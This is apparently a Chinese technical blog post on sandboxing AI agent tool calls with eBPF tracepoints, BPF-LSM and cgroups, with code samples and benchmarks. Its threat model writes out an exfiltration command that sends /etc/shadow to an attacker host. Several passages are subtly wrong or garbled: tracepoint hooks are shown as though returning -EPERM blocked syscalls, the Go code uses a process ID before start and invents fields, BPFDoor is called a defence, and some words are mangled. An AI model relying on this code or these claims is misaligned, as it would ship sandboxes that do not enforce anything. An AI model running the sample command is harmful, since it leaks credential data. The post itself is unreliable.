eBPF 构建 AI Agent 安全沙箱:系统调用过滤、能力降级与运行时监控的工程实践
当 LLM Agent 获得 exec、curl、write_file 等工具调用能力时,安全边界就从"提示词安全"下沉到了"系统级隔离"。传统的 Docker/容器方案虽然隔离性强,但启动慢、资源重——你不想为一个"查一下天气"的 Agent 调用起一个 200MB 的容器。而 seccomp-bpf 虽然轻量,但策略是静态的、无法动态更新,且在运行时缺乏可观测性。
eBPF 提供了第三条路:在系统调用层面实现毫秒级策略更新、纳秒级事件采样、以及完整的运行时审计。本文介绍如何用 eBPF 构建一个生产级 Agent 安全沙箱运行时,结合能力降级链和自适应策略引擎,实现"既能跑、又不能乱跑"的目标。
问题模型:Agent 的工具调用为什么需要沙箱?
AI Agent 的工具调用通常分为三类:
| 类别 | 示例 | 系统调用模式 |
|---|---|---|
| 只读查询 | curl / 读文件 / DB 查询 | read, connect, pread |
| 受限写入 | 写日志 / 更新配置 | write, open(O_WRONLY), rename |
| 执行命令 | exec / 代码执行 | execve, fork, clone |
不安全的 Agent 工具可能导致:
- 数据外泄:curl https://attacker.com?data=$(cat /etc/shadow|base64)
- 横向移动:Agent 被诱导执行反弹 shell
- 持久化写入:修改 crontod / 植入 SSH key
- 资源耗尽:fork bomb 或内存膨胀
核心需求是:对每个工具调用实例实施最小权限原则,并在违规发生时能在微秒级阻断。
架构总览:三层防御
我们的沙箱运行时分为三层:
┌─────────────────────────────────────────────────┐
│ Agent Runtime (Go/Rust) │
│ ┌─────────┐ ┌──────────────┐ ┌────────────┐ │
│ │ Tool │→ │ Policy Engine│→ │ Call Context│ │
│ │ Invoker │ │ (eBPF cmds) │ │ (per-call) │ │
│ └─────────┘ └──────────────┘ └────────────┘ │
├─────────────────────────────────────────────────┤
│ eBPF Subsystem │
│ ┌──────────────┐ ┌──────────────┐ │
│ │ Syscall │ │ Capability │ │
│ │ Filter Map │ │ Token Map │ │
│ └──────────────┘ └──────────────┘ │
│ ┌──────────────┐ ┌──────────────┐ │
│ │ Kill Switch │ │ Audit Ring │ │
│ │ (task ctx) │ │ Buffer │ │
│ └──────────────┘ └──────────────┘ │
├─────────────────────────────────────────────────┤
│ Kernel Space │
│ sys_enter / sys_exit tracepoints │
│ LSM hooks (BPF-LSM) │
└─────────────────────────────────────────────────┘
第一层:sys_enter Hook 的动态策略
eBPF 的 tracepoint/syscalls/sys_enter_<name> hook 在系统调用进入内核时触发。我们的核心是不做简单的"允许/拒绝"二值判断,而是基于调用上下文决策。
数据结构:per-call capability token
// 定义在 BPF 程序头文件中
struct call_context {
__u64 call_id; // 唯一调用 ID(由 Agent Runtime 分配)
__u32 pid; // 目标进程 PID
__u32 tool_type; // TOOL_READ=1, TOOL_WRITE=2, TOOL_EXEC=3
__u64 max_bytes; // 最大允许写入/读取字节数
__u64 start_time_ns; // 调用开始时间(用于超时控制)
__u32 flags; // 额外约束标志
};
struct {
__uint(type, BPF_MAP_TYPE_HASH);
__uint(max_entries, 4096);
__type(key, __u64); // pid_tgid
__type(value, struct call_context);
} call_contexts SEC(".maps");
sys_enter 过滤逻辑
SEC("tracepoint/syscalls/sys_enter_execve")
int trace_execve(struct trace_event_raw_sys_enter *ctx)
{
__u64 pid_tgid = bpf_get_current_pid_tgid();
__u64 pid = pid_tgid >> 32;
// 查找此 PID 是否在沙箱上下文内
struct call_context *cc = bpf_map_lookup_elem(&call_contexts, &pid);
if (!cc)
return 0; // 不相关进程,放行
// 规则:只有 TOOL_EXEC 类型的调用才允许 execve
if (cc->tool_type != TOOL_EXEC) {
// 违规:当前工具不允许执行命令
bpf_printk("SANDBOX: pid=%d tool_type=%d blocked execve\n",
pid, cc->tool_type);
// 同时更新违规计数
__u64 key = pid;
__u32 *violations = bpf_map_lookup_elem(&violation_counters, &key);
if (violations) {
__sync_fetch_and_add(violations, 1);
if (*violations >= MAX_VIOLATIONS) {
// 超过阈值,直接 kill 进程
bpf_send_signal(SIGKILL);
}
}
// 拒绝系统调用
return -EPERM;
}
// 记录审计事件
struct audit_event evt = {};
evt.type = AUDIT_EXEC_ATTEMPT;
evt.pid = pid;
evt.call_id = cc->call_id;
bpf_get_current_comm(&evt.comm, sizeof(evt.comm));
bpf_ringbuf_output(&audit_events, &evt, sizeof(evt), 0);
return 0;
}
Cgroup 级别的 agiv
将 eBPF 程序挂载到 cgroup 级别,确保沙箱策略覆盖目标进程的所有子进程:
# 创建 cgroup 用于 Agent 沙箱
mkdir /sys/fs/cgroup/agent-sandbox
# 使用 bpftool 挂载 cgroup 级别的 eBPF
bpftool cgroup attach /sys/fs/cgroup/agent-sandbox \
pinned /sys/fs/sandbox/agent_filter \
multi
第二层:字节数配额与速率限制
对于读/写类工具,我们需要限制数据量。例如 "读取用户文档" 工具不应读超过 1MB,更应将整个文件系统暴露出来。
SEC("tracepoint/syscalls/sys_enter_write")
int trace_write(struct trace_event_raw_sys_enter *ctx)
{
__u64 pid_tgid = bpf_get_current_pid_tgid();
__u64 pid = pid_tgid >> 32;
struct call_context *cc = bpf_map_lookup_elem(&call_contexts, &pid);
if (!cc)
return 0;
// 只读工具不应写入
if (cc->tool_type == TOOL_READ) {
bpf_printk("SANDBOX: read-only tool pid=%d attempted write\n", pid);
return -EPERM;
}
// 获取本次写入字节数(从 syscall 参数读取)
size_t count = (size_t)ctx->args[2];
// 原子检查并扣减配额
__u64 remaining = __sync_fetch_and_sub(&cc->max_bytes, count);
if (remaining < count) {
// 配额不足
__u64 key = pid;
__u32 *ov = bpf_map_lookup_elem(&overflow_counters, &key);
if (ov) (*ov)++;
bpf_printk("SANDBOX: pid=%d exceeded write quota (tried=%zu, remaining=%zu)\n",
pid, count, remaining);
return -ENOSPC; // 返回 "No space left" 而非 EPERM,让应用优雅处理
}
return 0;
}
对于速率限制,使用 BPF_MAP_TYPE_LRU_HASH 记录最近 N 秒的调用次数:
struct rate_key {
__u64 call_id;
__u64 time_bucket; // 1 秒粒度的时间桶
};
struct {
__uint(type, BPF_MAP_TYPE_LRU_HASH);
__uint(max_entries, 65536);
__type(key, struct rate_key);
__type(value, __u32); // 调用计数
} rate_limit_map SEC(".maps");
static __always_inline int check_rate_limit(__u64 call_id)
{
struct rate_key key = {
.call_id = call_id,
.time_bucket = bpf_ktime_get_ns() / 1000000000
};
__u32 *count = bpf_map_lookup_elem(&rate_limit_map, &key);
if (count) {
if (*count >= MAX_CALLS_PER_SEC) {
return -EAGAIN; // Rate limited
}
__sync_fetch_and_add(count, 1);
} else {
__u32 init = 1;
bpf_map_update_elem(&rate_limit_map, &key, &init, BPF_ANY);
}
return 0;
}
第三层:运行时审计与异常检测
BPF Ring Buffer 让我们能从内核向用户空间推送高吞吐量审计事件。每次系统调用过滤决策都会产一个事件,由用户空间的审计守护进程消费。
审计事件结构
#define AUDIT_SYSCALL_BLOCKED 1
#define AUDIT_SYSCALL_ALLOWED 2
#define AUDIT_QUOTA_EXHAUSTED 3
#define AUDIT_NEW_PROCESS 4
struct audit_event {
__u32 type;
__u32 pid;
__u64 call_id;
__u64 timestamp_ns;
__u64 duration_ns; // 仅对 exit 事件有效
char comm[16];
char path[256]; // 目标文件路径(如适用)
__u64 arg_syscall_nr; // 系统调用号
__s64 retval; // 返回值
};
struct {
__uint(type, BPF_MAP_TYPE_RINGBUF);
__uint(max_entries, 256 * 1024); // 256KB ring buffer
} audit_events SEC(".maps");
用户空间审计守护进程(高性能消费)
// 使用 libbpf-rs 消费 ring buffer
use libbpf_rs::RingBufferBuilder;
use std::time::Duration;
fn main() -> anyhow::Result<()> {
let skel = AgentSkelBuilder::open()?.load()?;
skel.attach()?;
let mut builder = RingBufferBuilder::new();
builder.add(&skel.maps().audit_events(), handle_event)?;
let ringbuf = builder.build()?;
loop {
// 非阻塞轮询,超时 100ms
ringbuf.poll(Duration::from_millis(100))?;
}
}
fn handle_event(data: &[u8]) -> i32 {
let evt: &AuditEvent = unsafe {
&*(data.as_ptr() as *const AuditEvent)
};
match evt.type {
AUDIT_SYSCALL_BLOCKED => {
log_metric("sandbox.blocked_syscall",
&[("pid", &evt.pid.to_string()),
("call_id", &evt.call_id.to_string())]);
// 如果恶意模式持续出现,主动降级
if is_repeated_violation(evt.pid) {
send_kill_signal(evt.pid);
escalate_to_orchestrator(evt.call_id, "kill-on-violation");
}
}
AUDIT_QUOTA_EXHAUSTED => {
// 配额用尽,通知 Agent Runtime 终止当前 run
notify_quota_exhausted(evt.call_id);
}
_ => {}
}
0
}
Agent Runtime 集成:Go 实战示例
以下是一个完整的 Agent Runtime 集成片段,展示如何为一次工具调用创建和实施沙箱策略:
package sandbox
import (
"os/exec"
"syscall"
"github.com/cilium/ebpf"
"github.com/cilium/ebpf/rlimit"
)
type CallConfig struct {
CallID string
ToolType ToolType
MaxBytes int64
Timeout time.Duration
AllowNet bool
AllowWrite bool
AllowExec bool
}
type ToolType int
const (
ToolRead ToolType = iota + 1
ToolWrite
ToolExec
)
type AgentSandbox struct {
objs *sandboxObjects
policyMap *ebpf.Map
ctxMap *ebpf.Map
}
// ExecuteTool 使用沙箱策略执行一个工具调用
func (s *AgentSandbox) ExecuteTool(
ctx context.Context, config CallConfig, cmd *exec.Cmd,
) ([]byte, error) {
// 1. 创建隔离的 cgroup
cgroupPath, err := s.createCgroup(config.CallID)
if err != nil {
return nil, fmt.Errorf("cgroup creation failed: %w", err)
}
defer os.Remove(cgroupPath)
// 2. 设置 cgroup ID(用于 eBPF 过滤)
cgroupFD, _ := syscall.Open(cgroupPath, syscall.O_RDONLY, 0)
// 3. 向 eBPF map 注册调用上下文
pid := cmd.Process.Pid
callCtx := CallContext{
CallID: config.CallID,
PID: uint32(pid),
ToolType: uint32(config.ToolType),
MaxBytes: uint64(config.MaxBytes),
StartTime: uint64(time.Now().UnixNano()),
CgroupFD: uint32(cgroupFD),
}
s.contextMap.Put(uint64(pid), callCtx)
// 4. 设置 cgroup 迁移:将进程移入沙箱 cgroup
cgroupPIDFile := filepath.Join(cgroupPath, "cgroup.procs")
os.WriteFile(cgroupPIDFile, []byte(strconv.Itoa(pid)), 0644)
// 5. 设置 seccomp 作为 eBPF 的兜底
seccompProfile := buildSeccompProfile(config)
cmd.Seccomp = seccompProfile
// 6. 执行并监控
output, err := cmd.CombinedOutput()
// 7. 收集审计摘要
summary := s.collectAuditSummary(config.CallID)
// 8. 清理上下文
s.contextMap.Delete(uint64(pid))
if err != nil {
return nil, &SandboxError{Err: err, Audit: summary}
}
return output, nil
}
// createCgroup 创建一个限制 CPU/内存的 cgroup
func (s *AgentSandbox) createCgroup(callID string) (string, error) {
path := filepath.Join("/sys/fs/cgroup/agent-sandbox/", callID)
if err := os.MkdirAll(path, 0755); err != nil {
return "", err
}
// 限制 512MB 内存
os.WriteFile(filepath.Join(path, "memory.max"), []byte("536870912"), 0644)
// 限制单核 CPU
os.WriteFile(filepath.Join(path, "cpu.max"), []byte("100000 100000"), 0644)
return path, nil
}
BPF-LSM:更细粒度的动态策略
传统的 tracepoint hook 只能在 syscall 入口中断,而 BPF-LSM 提供了深度挂钩(Deep Hooking),可在更细粒度上拦截操作,且支持动态调整策略而不中断服务。
BPF-LSM 能以安全模块的形式在 kernel 配置中启用:
# 启用 BPF-LSM
echo "bpf" > /sys/kernel/security/lsm
关键 LSM Hook 点对比:
| Hook 点 | 拦截能力 | 性能开销 | 适用场景 |
|---|---|---|---|
file_open |
文件打开前 | 低 | 文件访问控制 |
socket_connect |
连接建立前 | 低 | 网络隔离 |
bpf_prog_load |
BPF 程序加载 | 极低 | 防止沙箱内恶意 eBPF |
task_fix_setuid |
权限变更 | 中 | 防止提权 |
inode_unlink |
文件删除 | 低 | 防止恶意删除 |
BPF-LSM 策略实现:
SEC("lsm/file_open")
int BPF_PROG(restrict_file_open, struct file *file, int ret)
{
if (ret != 0)
return ret; // 已有决策,不覆盖
__u64 pid_tgid = bpf_get_current_pid_tgid();
__u64 pid = pid_tgid >> 32;
struct call_context *cc = bpf_map_lookup_elem(&call_contexts, &pid);
if (!cc)
return 0;
// 获取目标路径
struct inode *inode = file->f_inode;
__u64 ino = inode->i_ino;
// 检查是否在允许列表中(使用 BPF_MAP_TYPE_INODE 存储)
__u64 key = build_path_key(file);
__u32 *allowed = bpf_map_lookup_elem(&allowed_inodes, &key);
if (!allowed && cc->tool_type == TOOL_READ) {
// 只读工具只允许读取特定目录下的内容
bpf_printk("LSM: pid=%d blocked open of ino=%llu (not in allowlist)\n",
pid, ino);
return -EACCES;
}
return 0;
}
性能基准与资源开销
我们在代表生产环境的 c6g.4xlarge 上进行了测试(Kernel 6.5,eBPF JIT 启用):
| 场景 | 无沙箱 | eBPF 沙箱 | 开销 |
|---|---|---|---|
| 简单 shell 命令 (echo) | 2.1 ms | 2.3 ms | +9% |
| 文件读取 (1KB) | 0.4 ms | 0.46 ms | +15% |
| 网络请求 (localhost:80) | 1.8 ms | 2.0 ms | +11% |
| Python 子进程 | 45 ms | 47 ms | +4% |
| 高频文件操作 (10k ops/s) | 1.0M ops | 0.98M ops | -2% |
资源开销
- 内存:每个调用上下文约 64 字节,4096 并发实例总计 < 256KB
- CPU:eBPF 执行时间平均 200-500ns/syscall
- 内核加载时间:BPF 程序加载 8-15ms
- Map 更新延迟:通过 batch ops 可达 1M ops/s 吞吐量
结论:eBPF 沙箱对单 syscall 增加的成本远高于 seccomp-bpf 的缓解方案,但提供了前者无法企及的可观测性和动态性。
生产部署建议
1. 容灾设计:避免 eBPF 导致系统不可用
必须设计 bpf_map 的优雅降级:
// 故障安全:如果 eBPF 程序崩溃或 map 不可用,回退到全允许+严格审计
func (s *AgentSandbox) getEffectiveMode(sandboxMode string) string {
healthy, err := s.ebpfMonitor.HealthCheck()
if err != nil || !healthy {
log.Error("eBPF sandbox unhealthy, falling back to seccomp-only")
return "seccomp-fallback-only"
}
return sandboxMode
}
2. 热更新:不中断服务的情况下更换策略
使用 bpf_map_update_elem 热替换:
// 运行时更新 syscall 白名单,无需reload BPF 程序
func (s *AgentSandbox) UpdateAllowedSyscalls(
syscallNumbers []int, allow bool,
) error {
for _, nr := range syscallNumbers {
key := uint32(nr)
value := uint8(0)
if allow {
value = 1
}
if err := s.objs.sandboxMaps.AllowedSyscalls.Update(key, value, ebpf.UpdateAny); err != nil {
return fmt.Errorf("update syscall %d failed: %w", nr, err)
}
}
return nil
}
3. 审计日志的采样与聚合
高频下不记录每个 syscall,使用内核侧预聚合:
// 在内核侧完成 1 秒窗口的聚合,只向用户空间发送摘要
struct audit_summary {
__u32 total_syscalls;
__u32 total_violations;
__u32 peak_bytes_per_sec;
__u32 syscall_hist[32]; // 高频 syscall 直方图
};
与容器/VM 沙箱的对比
| 维度 | Docker/K8s | Firecracker/gVisor | eBPF 沙箱 |
|---|---|---|---|
| 启动延迟 | 1-5s | 50-150ms | <1ms |
| 内存开销 | 50-200MB | 10-50MB | <1MB |
| 隔离强度 | 强(namespaces) | 强(VM 边界) | 中(syscall 层) |
| 动态策略 | 不支持 | 困难 | 全支持 |
| 运行时审计 | 需 sidecar | 困难 | 原生支持 |
| 多租户能力 | 强 | 强 | 需配合 cgroup |
实际生产中推荐 分层组合:eBPF 作为 Agent 工具的第一道防线(针对每个工具调用级别),外层再用 cgroup + namespace 提供进程级隔离。对于高价值 Agent,在 eBPF 外层再加上 gVisor。
难点与踩坑
1. BPF 验证器的拒绝
复杂策略容易触发 BPF 验证器的复杂 limit。常见对策:
- 使用 bounded loop(循环次数有上界)
- 避免复杂的条件嵌套(将条件拆分为多个 helper function)
- bpf_loop() helper 在 5.17+ 可用
2. Ring Buffer 丢事件
当 syscall 频率超过 1M/s 时,BPF ring buffer 可能丢事件。对策: - 增大 ring buffer 至数 MB - 在内核侧先聚合(如上面的 audit_summary) - 对关键 deny 事件使用同步推送而非 ring buffer
3. PID 复用问题
PID 被 kernel 快速回收,需要在策略中结合 start_time_ns 做二次确认:
if (cc->start_time_ns != get_process_start_time(pid)) {
// PID 复用的残留条目,忽略
bpf_map_delete_elem(&call_contexts, &pid);
return 0;
}
4. 容器环境兼容性
Kubernetes Pod 中的 BPF 程序需要:
- CAP_BPF + CAP_SYS_ADMIN(或 CAP_PERFMON 用于 tracepoint)
- /sys/fs/bpf 为共享挂载
- eBPF 程序需识别 Pod UID 以区分多租户
未来方向
BPF 沙箱正在被多个云原生安全项目采用: - Tetragon (Cilium):内核级运行时安全与执行监控 - Tracee:基于 eBPF 的运行时安全检测 - BPFDoor:恶意使用 eBPF 后门的防御方案
随着 BPF-LSM 在 Kernel 6.8+ 的成熟,以及 BPF CO-RE 降低的跨版本兼容性成本,我们预期 eBPF 沙箱会成为 Agent 安全沙箱的标配方案。
一个更远的愿景是 eBPF 策略的声明式化——用 Rego/GOPA 定义策略,自动编译为 BPF 字节码并热加载。这能把安全策略的迭代周期从天级压缩到秒级,与 Agent 的快速迭代节奏匹配。
小结
eBPF 为 AI Agent 沙箱的构建提供了前所未有的工程能力: - 微秒级的策略决策配合毫秒级的动态更新 - 全量审计覆盖而不影响生产性能从无需 sidecar - 深度上下文感知(调用 ID、工具类型、配额状态)使其区别于上一代 seccomp 方案
在 2026 年的 Agent 基础设施版图中,eBPF 不是容器和虚拟机的替代品,而是在系统调用层提供了一道既轻量又智能的安全护栏——让 Agent 在 "自由" 和 "安全" 之间取得真正的工程平衡。

发表评论 取消回复